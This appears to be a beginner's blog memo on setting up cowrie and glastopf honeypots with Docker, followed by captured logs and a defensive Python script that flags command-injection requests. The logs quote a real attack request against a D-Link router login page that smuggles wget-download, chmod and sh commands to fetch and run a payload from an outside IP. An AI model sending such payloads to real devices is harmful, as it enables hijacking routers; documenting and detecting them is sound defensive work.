Beginner
Security

I tried setting up a honeypot

I had a long holiday, so I read a bit of a book called "Honeypot Observation Diary" (ハニーポット観察記録),
and this is a memo to myself from simply setting one up.
I've wanted to set one up for ages.
I installed cowrie and glastopf.
Setup time, meaning the time actually spent typing commands, was under 10 minutes. Docker is handy.

I'd like to start monitoring it from here on.

docker

First, install docker itself

sudo apt-get update
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    software-properties-common \
    emacs
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
   $(lsb_release -cs) \
   stable"

Docker Community Edition

Install CE as well

sudo apt-get update; sudo apt-get install docker-ce

cowrie

Set up an SSH-only honeypot

https://github.com/micheloosterhof/cowrie

docker pull cowrie/cowrie
bin/cowrie start

Check that it is running

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

Viewing the logs
I've only just set it up, so there's nothing in them yet.

Example of copying a log file out of the container
docker cp 54f219cb579c:/etc/hoge.txt hoge.txt
Log location inside the container
/cowrie/cowrie-git/log

Example of getting a shell inside the container
docker exec -it 54f219cb579c /bin/bash

Leave the shell with Ctrl+d (the container keeps running)

glastopf

Set up a web honeypot

git clone https://github.com/mushorg/glastopf.git
cd glastopf
docker build --rm --tag glastopf .
mkdir myhoneypot1
docker run --detach --publish 80:80 --volume myhoneypot1:/opt/myhoneypot glastopf

Check that it is running

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
2798c8515bf7        glastopf            "glastopf-runner"        3 minutes ago       Up 3 minutes        0.0.0.0:80->80/tcp   relaxed_kilby
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

Example of viewing the logs

Example of getting a shell inside the container
docker exec -it 2798c8515bf7 /bin/bash

Leave the shell with Ctrl+d (the container keeps running)

Infection example

IoT device malware

Apparently this is something that infects a D-Link router model called the "DSL-2750B".

log/glastopf.log.2018-08-15
2018-08-15 21:20:42,441 (glastopf.glastopf) 197.33.83.159 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 21:20:42,984 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 22:51:43,588 (glastopf.glastopf) 179.98.9.15 requested GET / on 2798c8515bf7:80
2018-08-15 22:53:18,342 (glastopf.glastopf) 177.11.140.205 requested GET / on 2798c8515bf7:80
2018-08-15 23:03:47,697 (glastopf.glastopf) 190.186.100.246 requested GET / on 2798c8515bf7:80
2018-08-15 23:33:58,562 (glastopf.glastopf) 41.37.152.8 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 23:33:59,107 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 23:53:57,893 (glastopf.glastopf) 117.50.7.159 requested GET / on 2798c8515bf7:80

https://www.cscloud.co.jp/news/press/201806251426/
http://octahedron.hatenablog.jp/entry/2018/07/25/005946
http://www.itmedia.co.jp/enterprise/articles/1806/21/news055.html
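As an added example (not part of the original post, and not glastopf's own code), a small Python triage script for the glastopf request lines above: it URL-decodes each request, flags requests whose query string carries shell separators together with download-and-execute tooling, and pulls the payload URL out as an indicator. The sample log text is constructed in the same layout as the log above, with TEST-NET addresses in place of the real ones.

```python
import re
from urllib.parse import unquote

# Constructed sample in the glastopf log layout shown above; the addresses
# are TEST-NET placeholders, not the ones from the real log.
SAMPLE_LOG = """\
2018-08-15 21:20:42,441 (glastopf.glastopf) 192.0.2.10 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.7/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 21:20:42,984 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
2018-08-15 22:51:43,588 (glastopf.glastopf) 203.0.113.5 requested GET / on 2798c8515bf7:80
"""

# "<date> <time> (glastopf.glastopf) <src> requested <METHOD> <path> on <host>:<port>"
REQUEST_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \(glastopf\.glastopf\) (?P<src>\S+) requested "
    r"(?P<method>[A-Z]+) (?P<path>\S+) on (?P<dst>\S+)$"
)
# Shell command separators plus download-and-execute tooling: neither belongs
# in a router login form parameter.
SHELL_SEP_RE = re.compile(r"[;|`]|\$\(|&&")
EXEC_TOOLS = ("wget ", "curl ", "tftp ", "chmod ", "sh ")
URL_RE = re.compile(r"https?://[^\s;'\"`|]+")

def parse_request(line):
    """Parse one request line into a dict, or None for non-request lines."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote(rec["path"])  # undo %20, %27, ...
    return rec

def classify(rec):
    """Return (verdict, payload_urls) for a parsed request."""
    query = rec["decoded_path"].partition("?")[2]
    if SHELL_SEP_RE.search(query) and any(t in query for t in EXEC_TOOLS):
        return "command_injection", URL_RE.findall(query)
    return "benign_probe", []

def triage(log_text):
    """Walk a glastopf log and return one finding per request line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_request(line)
        if rec is None:
            continue  # rfi handler output and tracebacks carry no request
        verdict, urls = classify(rec)
        findings.append({"ts": rec["ts"], "src": rec["src"],
                         "verdict": verdict, "payload_urls": urls})
    return findings
```

`triage(open("log/glastopf.log.2018-08-15").read())` returns one finding per request, so the source addresses and payload URLs of the flagged ones can be fed straight into a blocklist or a lookup.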

Ah.

sftp-config.json